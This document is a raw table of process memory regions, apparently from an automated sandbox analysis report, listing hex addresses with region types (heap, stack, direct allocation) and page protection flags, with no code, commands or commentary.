|
direct allocation
|
page read and write
|
||
19981FF000
|
stack
|
page read and write
|
||
FF38E7E000
|
stack
|
page read and write
|
||
364A000
|
heap
|
page read and write
|
||
D11000
|
unkown
|
page execute read
|
||
86A5000
|
direct allocation
|
page read and write
|
||
93000
|
stack
|
page read and write
|
||
863B000
|
direct allocation
|
page read and write
|
||
F9E000
|
unkown
|
page write copy
|
||
77F1000
|
heap
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
4EEE000
|
stack
|
page read and write
|
||
539F000
|
stack
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page read and write
|
||
1C59000
|
heap
|
page read and write
|
||
3440000
|
heap
|
page read and write
|
||
18A0000
|
heap
|
page read and write
|
||
3650000
|
heap
|
page read and write
|
||
F9E000
|
unkown
|
page write copy
|
||
778A000
|
heap
|
page read and write
|
||
342F000
|
direct allocation
|
page read and write
|
||
2C79000
|
heap
|
page read and write
|
||
7AC4000
|
heap
|
page read and write
|
||
2733000
|
direct allocation
|
page read and write
|
||
32D6000
|
heap
|
page read and write
|
||
7D47000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
412000
|
unkown
|
page read and write
|
||
1717000
|
heap
|
page read and write
|
||
2449000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
22CD000
|
direct allocation
|
page read and write
|
||
8736000
|
direct allocation
|
page read and write
|
||
2D3F000
|
stack
|
page read and write
|
||
42B0000
|
direct allocation
|
page execute and read and write
|
||
6A5F000
|
stack
|
page read and write
|
||
7AB8000
|
heap
|
page read and write
|
||
3280000
|
heap
|
page read and write
|
||
51F0000
|
trusted library allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
7710000
|
heap
|
page read and write
|
||
3096000
|
heap
|
page read and write
|
||
7FCA0000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
19C000
|
stack
|
page read and write
|
||
4000000
|
direct allocation
|
page execute and read and write
|
||
FE3000
|
heap
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
2BE17445000
|
trusted library allocation
|
page read and write
|
||
2BE17470000
|
trusted library allocation
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
34A2000
|
heap
|
page read and write
|
||
356F000
|
stack
|
page read and write
|
||
480F000
|
stack
|
page read and write
|
||
32F6000
|
heap
|
page read and write
|
||
8E8000
|
unkown
|
page execute and read and write
|
||
3950000
|
direct allocation
|
page execute and read and write
|
||
869B000
|
direct allocation
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
888000
|
unkown
|
page execute and write copy
|
||
CBE000
|
stack
|
page read and write
|
||
37F0000
|
direct allocation
|
page execute and read and write
|
||
7D9B000
|
heap
|
page read and write
|
||
5B6000
|
unkown
|
page readonly
|
||
329A000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
348E000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3D60000
|
direct allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute and read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2BE17518000
|
trusted library allocation
|
page read and write
|
||
D11000
|
unkown
|
page execute read
|
||
3484000
|
heap
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
329C000
|
stack
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
88E000
|
stack
|
page read and write
|
||
12BE000
|
heap
|
page read and write
|
||
86C0000
|
direct allocation
|
page read and write
|
||
61E89000
|
unkown
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3C20000
|
direct allocation
|
page execute and read and write
|
||
7D71000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
2BE17460000
|
trusted library allocation
|
page read and write
|
||
3446000
|
direct allocation
|
page read and write
|
||
FF3907E000
|
stack
|
page read and write
|
||
12D7000
|
heap
|
page read and write
|
||
2BE174A2000
|
trusted library allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
1717000
|
heap
|
page read and write
|
||
349C000
|
direct allocation
|
page read and write
|
||
3291000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page execute and read and write
|
||
8B13000
|
direct allocation
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
F3E000
|
heap
|
page read and write
|
||
708000
|
heap
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
1AE3000
|
heap
|
page read and write
|
||
2E14000
|
trusted library allocation
|
page read and write
|
||
330E000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
3454000
|
direct allocation
|
page read and write
|
||
349C000
|
heap
|
page read and write
|
||
739000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2BE174D0000
|
trusted library allocation
|
page read and write
|
||
22D8000
|
direct allocation
|
page read and write
|
||
6B9F000
|
stack
|
page read and write
|
||
3313000
|
direct allocation
|
page read and write
|
||
16F0000
|
direct allocation
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
87E2000
|
direct allocation
|
page read and write
|
||
2F7D000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2BE174BE000
|
trusted library allocation
|
page read and write
|
||
FF37E7B000
|
stack
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
1B0E000
|
heap
|
page read and write
|
||
7FE38000
|
direct allocation
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
1B1A000
|
heap
|
page read and write
|
||
95CF000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
36D0000
|
direct allocation
|
page execute and read and write
|
||
32CC000
|
heap
|
page read and write
|
||
52D000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
500A000
|
trusted library allocation
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
868C000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
3E90000
|
direct allocation
|
page execute and read and write
|
||
4BB0000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8490000
|
trusted library allocation
|
page read and write
|
||
51D2000
|
trusted library allocation
|
page read and write
|
||
12E1000
|
heap
|
page read and write
|
||
16F0000
|
heap
|
page read and write
|
||
500E000
|
trusted library allocation
|
page read and write
|
||
4574000
|
direct allocation
|
page read and write
|
||
2BE1754A000
|
trusted library allocation
|
page read and write
|
||
7C7000
|
heap
|
page read and write
|
||
15FD000
|
stack
|
page read and write
|
||
5D2C000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8610000
|
direct allocation
|
page read and write
|
||
2EE9000
|
heap
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
12A3000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
3484000
|
heap
|
page read and write
|
||
6CC1000
|
direct allocation
|
page read and write
|
||
7FE000
|
heap
|
page read and write
|
||
18CB000
|
heap
|
page read and write
|
||
7FD5E000
|
direct allocation
|
page read and write
|
||
8A60000
|
direct allocation
|
page read and write
|
||
4430000
|
direct allocation
|
page execute and read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
3EB0000
|
direct allocation
|
page execute and read and write
|
||
7FE15000
|
direct allocation
|
page read and write
|
||
2976000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
2BE11F80000
|
trusted library allocation
|
page read and write
|
||
7610000
|
heap
|
page read and write
|
||
1A820FF000
|
stack
|
page read and write
|
||
61E98000
|
unkown
|
page read and write
|
||
3610000
|
direct allocation
|
page execute and read and write
|
||
6C21000
|
direct allocation
|
page read and write
|
||
2491000
|
direct allocation
|
page read and write
|
||
3E40000
|
direct allocation
|
page execute and read and write
|
||
2DF8000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1997D1C000
|
stack
|
page read and write
|
||
227B000
|
direct allocation
|
page read and write
|
||
3561000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
3B60000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
4240000
|
direct allocation
|
page execute and read and write
|
||
2CAA000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
349D000
|
heap
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
12BE000
|
heap
|
page read and write
|
||
321B000
|
heap
|
page read and write
|
||
2BE17570000
|
trusted library allocation
|
page read and write
|
||
355A000
|
heap
|
page read and write
|
||
1892000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1FF665A4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1130000
|
trusted library allocation
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
FF38F7E000
|
stack
|
page read and write
|
||
7F8000
|
heap
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
2BE12E80000
|
trusted library section
|
page readonly
|
||
2E6C000
|
stack
|
page read and write
|
||
61E8A000
|
unkown
|
page readonly
|
||
3448000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
910E000
|
stack
|
page read and write
|
||
2BE176F0000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
3CA0000
|
direct allocation
|
page execute and read and write
|
||
39E0000
|
direct allocation
|
page execute and read and write
|
||
32F6000
|
heap
|
page read and write
|
||
3F50000
|
direct allocation
|
page execute and read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
52A0000
|
trusted library allocation
|
page read and write
|
||
3406000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1295C1BE000
|
heap
|
page read and write
|
||
2B30000
|
trusted library allocation
|
page execute and read and write
|
||
66E6000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
12A4000
|
heap
|
page read and write
|
||
4548000
|
direct allocation
|
page read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
1295C1BE000
|
heap
|
page read and write
|
||
354E000
|
stack
|
page read and write
|
||
3A20000
|
direct allocation
|
page execute and read and write
|
||
34A2000
|
heap
|
page read and write
|
||
3D40000
|
direct allocation
|
page execute and read and write
|
||
570E000
|
stack
|
page read and write
|
||
886000
|
unkown
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
3691000
|
heap
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
1295C206000
|
heap
|
page read and write
|
||
F57000
|
heap
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
B6E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1C68000
|
heap
|
page read and write
|
||
977E000
|
stack
|
page read and write
|
||
7AB000
|
heap
|
page read and write
|
||
397E000
|
stack
|
page read and write
|
||
23DB000
|
direct allocation
|
page read and write
|
||
1AE3000
|
heap
|
page read and write
|
||
3C19000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2B80000
|
heap
|
page read and write
|
||
513000
|
unkown
|
page readonly
|
||
3A40000
|
direct allocation
|
page execute and read and write
|
||
86C2000
|
direct allocation
|
page read and write
|
||
33D4000
|
direct allocation
|
page execute and read and write
|
||
7C8000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
97BD000
|
stack
|
page read and write
|
||
8704000
|
direct allocation
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
2F45000
|
heap
|
page read and write
|
||
38B0000
|
direct allocation
|
page execute and read and write
|
||
3830000
|
direct allocation
|
page execute and read and write
|
||
3460000
|
direct allocation
|
page read and write
|
||
3DB0000
|
direct allocation
|
page execute and read and write
|
||
2CC1000
|
heap
|
page read and write
|
||
226C000
|
direct allocation
|
page read and write
|
||
21C3000
|
direct allocation
|
page read and write
|
||
1B0E000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
66DE000
|
stack
|
page read and write
|
||
3650000
|
direct allocation
|
page execute and read and write
|
||
77F1000
|
heap
|
page read and write
|
||
3649000
|
heap
|
page read and write
|
||
4020000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
66F0000
|
heap
|
page read and write
|
||
32DC000
|
heap
|
page read and write
|
||
1AEC000
|
heap
|
page read and write
|
||
360F000
|
stack
|
page read and write
|
||
3417000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3A70000
|
direct allocation
|
page execute and read and write
|
||
8CD0000
|
direct allocation
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
321F000
|
heap
|
page read and write
|
||
9EA000
|
unkown
|
page execute and read and write
|
||
3554000
|
heap
|
page read and write
|
||
1147000
|
trusted library allocation
|
page execute and read and write
|
||
3B40000
|
direct allocation
|
page execute and read and write
|
||
68B0000
|
trusted library allocation
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
5180000
|
trusted library allocation
|
page read and write
|
||
DFE000
|
stack
|
page read and write
|
||
774F000
|
stack
|
page read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
31CF000
|
stack
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
12BE9AE4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
33B5000
|
heap
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
1ABEB0E000
|
stack
|
page read and write
|
||
696000
|
heap
|
page read and write
|
||
7FD70000
|
direct allocation
|
page read and write
|
||
3B30000
|
direct allocation
|
page execute and read and write
|
||
FF395FB000
|
stack
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
55BD000
|
stack
|
page read and write
|
||
A6FE000
|
stack
|
page read and write
|
||
346F000
|
stack
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
7724000
|
heap
|
page read and write
|
||
2BE17515000
|
trusted library allocation
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
FF398FE000
|
unkown
|
page readonly
|
||
3F10000
|
direct allocation
|
page execute and read and write
|
||
71E000
|
stack
|
page read and write
|
||
2B40000
|
heap
|
page execute and read and write
|
||
34AA000
|
heap
|
page read and write
|
||
1295C1ED000
|
heap
|
page read and write
|
||
2F78000
|
heap
|
page read and write
|
||
86F4000
|
direct allocation
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
21A0000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2BE1749F000
|
trusted library allocation
|
page read and write
|
||
960E000
|
stack
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
3560000
|
heap
|
page read and write
|
||
2BE1202B000
|
heap
|
page read and write
|
||
22C3000
|
direct allocation
|
page read and write
|
||
2CBC000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
778D000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
3565000
|
heap
|
page read and write
|
||
3D10000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
3D20000
|
direct allocation
|
page execute and read and write
|
||
970F000
|
stack
|
page read and write
|
||
4DDD000
|
direct allocation
|
page read and write
|
||
355F000
|
heap
|
page read and write
|
||
4D2B000
|
direct allocation
|
page read and write
|
||
2BBE000
|
trusted library allocation
|
page read and write
|
||
7617000
|
heap
|
page read and write
|
||
F13000
|
trusted library allocation
|
page execute and read and write
|
||
3810000
|
direct allocation
|
page execute and read and write
|
||
45C3000
|
direct allocation
|
page read and write
|
||
3472000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
3FA0000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1067000
|
unkown
|
page write copy
|
||
34A5000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
184B000
|
heap
|
page read and write
|
||
1295C1C2000
|
heap
|
page read and write
|
||
3AB0000
|
direct allocation
|
page execute and read and write
|
||
50A000
|
unkown
|
page read and write
|
||
75F000
|
heap
|
page read and write
|
||
5008000
|
trusted library allocation
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
36E3000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
D5E000
|
stack
|
page read and write
|
||
22D4000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
22B0000
|
direct allocation
|
page read and write
|
||
31B0000
|
direct allocation
|
page read and write
|
||
1B21000
|
heap
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
1136000
|
trusted library allocation
|
page execute and read and write
|
||
1B25000
|
heap
|
page read and write
|
||
3BC0000
|
direct allocation
|
page execute and read and write
|
||
11E7000
|
heap
|
page read and write
|
||
3620000
|
heap
|
page read and write
|
||
7611000
|
heap
|
page read and write
|
||
4090000
|
direct allocation
|
page execute and read and write
|
||
311E000
|
stack
|
page read and write
|
||
2BE173A0000
|
trusted library allocation
|
page read and write
|
||
3303000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1ADB000
|
heap
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8B49000
|
direct allocation
|
page read and write
|
||
3494000
|
heap
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
3238000
|
stack
|
page read and write
|
||
7B3000
|
heap
|
page read and write
|
||
3770000
|
heap
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
2BE17600000
|
heap
|
page read and write
|
||
2BE1770F000
|
heap
|
page read and write
|
||
18CE000
|
heap
|
page read and write
|
||
1FF66210000
|
heap
|
page read and write
|
||
2F0F000
|
stack
|
page read and write
|
||
2BE17420000
|
trusted library allocation
|
page read and write
|
||
2CFE000
|
stack
|
page read and write
|
||
2BE1752F000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
90E000
|
stack
|
page read and write
|
||
2BE127D1000
|
trusted library allocation
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
FF387FE000
|
unkown
|
page readonly
|
||
2FF0000
|
heap
|
page read and write
|
||
3840000
|
direct allocation
|
page execute and read and write
|
||
3880000
|
direct allocation
|
page execute and read and write
|
||
2BE12092000
|
heap
|
page read and write
|
||
942000
|
unkown
|
page readonly
|
||
33A4000
|
heap
|
page read and write
|
||
128F000
|
stack
|
page read and write
|
||
1066000
|
unkown
|
page write copy
|
||
2325000
|
heap
|
page read and write
|
||
12D8000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
43F0000
|
direct allocation
|
page execute and read and write
|
||
1180000
|
heap
|
page read and write
|
||
871E000
|
direct allocation
|
page read and write
|
||
50AE000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1B0B000
|
heap
|
page read and write
|
||
3BD0000
|
direct allocation
|
page execute and read and write
|
||
7721000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7784000
|
heap
|
page read and write
|
||
11DA000
|
heap
|
page read and write
|
||
2BE12043000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
294E000
|
stack
|
page read and write
|
||
ABF000
|
stack
|
page read and write
|
||
1C6D000
|
heap
|
page read and write
|
||
5012000
|
trusted library allocation
|
page read and write
|
||
2466000
|
direct allocation
|
page read and write
|
||
239F000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8AF7000
|
direct allocation
|
page read and write
|
||
32B5000
|
heap
|
page read and write
|
||
3320000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
34A8000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2BE0000
|
trusted library allocation
|
page read and write
|
||
331E000
|
direct allocation
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
778E000
|
stack
|
page read and write
|
||
32C5000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
41D0000
|
direct allocation
|
page execute and read and write
|
||
7721000
|
heap
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
2BE1208B000
|
heap
|
page read and write
|
||
247C000
|
direct allocation
|
page read and write
|
||
29BF000
|
stack
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
1C60000
|
heap
|
page read and write
|
||
2BE17431000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2748000
|
direct allocation
|
page read and write
|
||
57DF000
|
heap
|
page read and write
|
||
3EC0000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
4BD000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1666000
|
unkown
|
page execute and write copy
|
||
348D000
|
heap
|
page read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
1B27000
|
heap
|
page read and write
|
||
1295C3E4000
|
heap
|
page read and write
|
||
32B5000
|
heap
|
page read and write
|
||
5B8000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3178000
|
heap
|
page read and write
|
||
7D59000
|
heap
|
page read and write
|
||
7DE2000
|
heap
|
page read and write
|
||
2BE17524000
|
trusted library allocation
|
page read and write
|
||
3C17000
|
heap
|
page read and write
|
||
A6B000
|
unkown
|
page execute and read and write
|
||
61E99000
|
unkown
|
page readonly
|
||
906000
|
heap
|
page read and write
|
||
7B1C000
|
heap
|
page read and write
|
||
3CD0000
|
direct allocation
|
page execute and read and write
|
||
7FDCE000
|
direct allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
1B25000
|
heap
|
page read and write
|
||
9D3000
|
unkown
|
page execute and read and write
|
||
1B2B000
|
heap
|
page read and write
|
||
3151000
|
heap
|
page read and write
|
||
795000
|
heap
|
page read and write
|
||
FF38C7E000
|
stack
|
page read and write
|
||
3468000
|
heap
|
page read and write
|
||
6DE000
|
stack
|
page read and write
|
||
4220000
|
direct allocation
|
page execute and read and write
|
||
276C000
|
direct allocation
|
page read and write
|
||
111C000
|
stack
|
page read and write
|
||
F2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FDF8000
|
direct allocation
|
page read and write
|
||
34AB000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
1AF4000
|
heap
|
page read and write
|
||
163E000
|
stack
|
page read and write
|
||
3770000
|
heap
|
page read and write
|
||
3920000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
1AD9000
|
heap
|
page read and write
|
||
8806000
|
direct allocation
|
page read and write
|
||
8E8F000
|
stack
|
page read and write
|
||
87D4000
|
direct allocation
|
page read and write
|
||
663E000
|
direct allocation
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1B21000
|
heap
|
page read and write
|
||
318F000
|
heap
|
page read and write
|
||
4380000
|
direct allocation
|
page execute and read and write
|
||
2EAC000
|
stack
|
page read and write
|
||
3468000
|
heap
|
page read and write
|
||
32E3000
|
direct allocation
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
2C9E000
|
heap
|
page read and write
|
||
11AE000
|
stack
|
page read and write
|
||
FF386FC000
|
stack
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
36E0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
30E0000
|
heap
|
page read and write
|
||
245F000
|
direct allocation
|
page read and write
|
||
1DE000
|
stack
|
page read and write
|
||
1AFE000
|
heap
|
page read and write
|
||
12A3000
|
heap
|
page read and write
|
||
326F000
|
stack
|
page read and write
|
||
2BE17494000
|
trusted library allocation
|
page read and write
|
||
3F90000
|
direct allocation
|
page execute and read and write
|
||
1559000
|
heap
|
page read and write
|
||
8B3A000
|
direct allocation
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
3495000
|
heap
|
page read and write
|
||
1C55000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
7DD0000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3325000
|
direct allocation
|
page read and write
|
||
22CA000
|
direct allocation
|
page read and write
|
||
6F00000
|
trusted library allocation
|
page read and write
|
||
5014000
|
trusted library allocation
|
page read and write
|
||
1640000
|
heap
|
page read and write
|
||
419000
|
unkown
|
page write copy
|
||
3CB0000
|
direct allocation
|
page execute and read and write
|
||
3350000
|
direct allocation
|
page read and write
|
||
129C000
|
heap
|
page read and write
|
||
2458000
|
direct allocation
|
page read and write
|
||
3E70000
|
direct allocation
|
page execute and read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
3A90000
|
direct allocation
|
page execute and read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
CF6000
|
heap
|
page read and write
|
||
1061000
|
unkown
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
4400000
|
direct allocation
|
page execute and read and write
|
||
8620000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
CD000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2C9E000
|
heap
|
page read and write
|
||
3370000
|
direct allocation
|
page execute and read and write
|
||
2BE1208D000
|
heap
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
7721000
|
heap
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
182E000
|
stack
|
page read and write
|
||
1909000
|
heap
|
page read and write
|
||
11AE000
|
stack
|
page read and write
|
||
3F20000
|
direct allocation
|
page execute and read and write
|
||
691F000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
16D0000
|
heap
|
page read and write
|
||
F1D000
|
trusted library allocation
|
page execute and read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2724000
|
direct allocation
|
page read and write
|
||
3299000
|
heap
|
page read and write
|
||
32BB000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
4230000
|
direct allocation
|
page execute and read and write
|
||
5014000
|
trusted library allocation
|
page read and write
|
||
6BBA000
|
direct allocation
|
page read and write
|
||
8370000
|
direct allocation
|
page execute and read and write
|
||
2EE2000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
direct allocation
|
page read and write
|
||
4501000
|
direct allocation
|
page read and write
|
||
2BE175D0000
|
remote allocation
|
page read and write
|
||
8B11000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2450000
|
direct allocation
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
7FD2E000
|
direct allocation
|
page read and write
|
||
2BE17700000
|
heap
|
page read and write
|
||
3295000
|
heap
|
page read and write
|
||
39A0000
|
direct allocation
|
page execute and read and write
|
||
778B000
|
heap
|
page read and write
|
||
929000
|
unkown
|
page execute and read and write
|
||
2BE174D3000
|
trusted library allocation
|
page read and write
|
||
7611000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
33C1000
|
direct allocation
|
page execute and read and write
|
||
4DD0000
|
direct allocation
|
page read and write
|
||
5A1000
|
unkown
|
page read and write
|
||
3760000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
562F000
|
stack
|
page read and write
|
